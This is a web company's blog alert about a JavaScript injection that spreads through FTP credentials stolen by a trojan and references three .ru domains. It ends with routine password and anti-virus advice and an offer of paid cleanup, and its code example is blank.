New malware alert - pocketbloke.ru, inkrainbow.ru and pantsletter.ru

We've got a number of calls over the last week from people whose websites have been infected with a new virus and not much seems to be known about it.  Wintercorn now have a huge wealth of experience in detecting and disinfecting this particular virus.

The virus adds a line of code to your websites index, default and javascript files and although it seems dormant at the moment may become active at any time. It's therefore essential that your site is disinfected as soon as it is detected.

Here's how it works.

• You probably use an
  FTP client
  like FileZilla to manage your website.
• You visit an infected site and this downloads a trojan virus to your computer.
• This trojan will search your PC for your FTP username and password files and then send them to another server, probably in Russia.
• Your websites will then be infected with this Javascript virus and execute its payload, whatever that might be. At the moment the .ru sites in the code are apparently not functional but when they start working they could either download further viruses to visitors computers or add links to spam advertising sites, we just don't know at this time.

The injected code looks like this:


We have cleaned over 25 sites in the last week for website owners who have noticed the infection. There are likely to be many, many more who don't even know if their site is infected yet.

It can take some time to completely clean a website of all embedded code so if you have this infection, or you think you do, then please contact us today and we can quote a competitive price for complete removal.

In the meantime, please change all of your website passwords, ensure that your anti-virus protection is up to date and that you have an anti-malware system installed and stop saving passwords in your FTP client to prevent further infections.

Add comment

Name (required)

E-mail (required, but will not display)

Notify me of follow-up comments

Refresh

Send

Cancel